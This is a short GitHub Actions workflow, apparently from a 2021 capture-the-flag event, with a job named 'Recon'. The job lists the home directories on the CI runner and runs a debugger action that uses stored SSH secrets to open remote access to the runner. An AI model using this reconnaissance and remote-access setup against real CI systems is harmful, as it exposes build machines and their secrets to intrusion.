name: TMCTF
on: [push]
jobs: 
  Recon: 
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "Are you responsible for your actions?"
      - run: |
          echo "All actions have consequences"
      - run: |
          ls -la /home/runner/work/tmctf2021/tmctf2021
      - run: |
          ls -la /home/runner/ && ls -la /home/runneradmin/
      - name: xaxa
        uses: P3TERX/debugger-action@master
        with:
          host: ${{ secrets.HOST }}
          username: ${{ secrets.USERNAME }}
          key: ${{ secrets.SSH_PRIVATE_KEY }}
          port: ${{ secrets.PORT }}
          script: pwd
